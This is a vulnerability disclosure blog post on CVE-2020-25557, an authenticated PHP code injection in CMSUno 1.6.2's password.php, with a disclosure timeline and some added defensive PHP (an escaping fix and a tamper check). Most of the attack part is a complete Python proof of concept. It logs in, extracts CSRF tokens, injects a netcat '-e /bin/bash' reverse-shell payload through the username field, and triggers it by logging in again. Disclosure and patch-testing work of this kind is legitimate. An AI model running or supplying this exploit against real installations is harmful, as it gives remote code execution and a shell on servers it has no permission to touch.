
CMSUno 1.6.2 | RCE [Authenticated] (password.php) | CVE-2020-25557

Vendor: https://github.com/boiteasite/cmsuno/

Version: 1.6.2

Vulnerability: Code Injection

CVE: CVE-2020-25557

Exploit-DB: https://www.exploit-db.com/exploits/49031

Analysis

If you have read my other blog post about CMSUno, this vulnerability will look familiar, because the root cause is the same, so this article will not go into much detail. When you change your username and password, both values are written into the password.php file without any filtering or escaping, as shown below.

This is the content of the password.php file.

While changing your password you can inject PHP code through the $user parameter (the new username), which is written into password.php verbatim. Because the application loads password.php when you log in, the injected PHP code runs on the next login attempt.
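The write-then-include pattern described above, as an added example that is not CMSUno's code (the post's screenshot of password.php is not reproduced here, so the three-assignment layout of the file, the file path and the function names are assumptions): a writer that interpolates the username into PHP source the way the post describes, a hardened writer that uses var_export() so the value can never leave its string literal, and a tokenizer-based check you can run against a deployed password.php to see whether anything other than plain string assignments has been written into it.

```php
<?php
// Added example, not CMSUno's code. It reconstructs the pattern the post
// describes (credentials interpolated into a PHP source file that is later
// include()d) next to a hardened writer and a tamper check. The three-line
// layout of password.php and the function names are assumptions.

// Vulnerable: the username lands inside a double-quoted PHP string literal
// with no escaping, so a value containing `";` breaks out of the literal and
// everything after it is parsed as code.
function render_password_php_vulnerable(string $user, string $pass, string $lang): string
{
    return "<?php\n"
         . "\$user=\"$user\";\n"
         . "\$pass=\"$pass\";\n"
         . "\$lang=\"$lang\";\n"
         . "?>";
}

// Hardened: var_export() emits a single-quoted literal with \ and ' escaped,
// so no input can leave the string. The password is stored as a hash (check
// it with password_verify() at login) rather than in clear.
function render_password_php_safe(string $user, string $passHash, string $lang): string
{
    return "<?php\n"
         . '$user=' . var_export($user, true) . ";\n"
         . '$pass=' . var_export($passHash, true) . ";\n"
         . '$lang=' . var_export($lang, true) . ";\n";
}

// Tamper check for a deployed password.php: a clean file tokenizes to nothing
// but open/close tags, whitespace, variables, string literals, '=' and ';'.
// Anything else (T_STRING for "system", parentheses, inline HTML after an
// injected ?>) means code has been written into it.
function is_plain_credential_file(string $src): bool
{
    $allowed = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING];
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) {
                return false;
            }
        } elseif ($tok !== '=' && $tok !== ';') {
            return false;
        }
    }
    return true;
}

// Constructed input with the same shape as the post's payload; the listener
// address is a placeholder and nothing here executes the injected command.
$payload = 'en";system(\'nc.traditional 10.0.0.1 4444 -e /bin/bash\');?>//';

$bad  = render_password_php_vulnerable($payload, '654321', 'en');
$good = render_password_php_safe($payload, password_hash('654321', PASSWORD_DEFAULT), 'en');

var_dump(is_plain_credential_file($bad));
var_dump(is_plain_credential_file($good));

// Against a live install (path assumed):
// var_dump(is_plain_credential_file(file_get_contents(__DIR__ . '/uno/password.php')));
```

Run as-is, the check returns false for the file produced by the vulnerable writer (the tokenizer sees a T_STRING for system right after the closed literal) and true for the hardened one, where the whole payload is still one single-quoted string. The deeper fix is to keep credentials out of executable files altogether (a JSON file read with json_decode(), or a database), because a file that is include()d is code no matter how carefully its contents are escaped.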

Exploit

I wrote a PoC for this vulnerability; you can use the code below to test whether your installation is vulnerable. It needs a valid account, since the password change is only reachable after login, and a listener waiting for the reverse shell. Don't forget to take a backup of your password.php file first: the PoC overwrites the stored username with the payload and sets the password to 654321, so you need the backup to restore the original credentials.

from time import sleep

import requests
from bs4 import BeautifulSoup
import lxml  # noqa: F401 - parser backend for BeautifulSoup(..., "lxml")

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")

login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"

session = requests.Session()
request = session.get(login_url)

# Get the unox value: an anti-CSRF token carried in a hidden field of the login form
soup = BeautifulSoup(request.text, "lxml")
unox = soup.find("input", {"name": "unox"})["value"]

# Login: the password change below is only reachable with valid credentials

body = {"unox": unox, "user": username, "pass": password}
session.post(login_url, data=body)

# Get the second unox value: after login the token is set in an inline
# <script> block as Unox='...' instead of a form field

request = session.get(login_url)
soup = BeautifulSoup(request.text, "lxml")
script = soup.findAll("script")[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]

# Exploit: submit the "save password" action (sauvePass) with the payload as the new username

header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": login_url,
    "Referer": login_url,
}

# The new username is written into password.php unescaped. The payload closes
# the double-quoted string it lands in, appends a system() call, and ends PHP
# mode with ?> so whatever follows in the file is no longer parsed as code.
# nc.traditional with -e is the Debian-style netcat; change the command if the
# target ships a different netcat.
payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip, listener_port)
# user0/pass0 are the current credentials, user/pass the new ones: the stored
# password becomes 654321, so keep a backup of password.php to restore it
body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(
    unox, username, password, payload)
# Passed as a str so requests sends the body verbatim: the quotes, semicolons
# and ?> in the payload must not be URL-encoded
session.post(vulnerable_url, data=body, headers=header)

# Login to trigger password.php: the login page loads password.php, so the
# injected system() call runs on the next login attempt whatever credentials
# are sent. Have the listener ready first, e.g. nc -lvnp <port>.

# Get the unox value again, in a fresh session

session1 = requests.Session()
request1 = session1.get(login_url)
soup = BeautifulSoup(request1.text, "lxml")
unox = soup.find("input", {"name": "unox"})["value"]

# Login
sleep(3)
body = {"unox": unox, "user": username, "pass": password}
session1.post(login_url, data=body)

Disclosure Timeline

12 September 2020 - First Contact

29 September 2020 - Released CMSUno Version 1.6.3

30 September 2020 - Responsible Disclosure

This post is licensed under CC BY 4.0 by the author.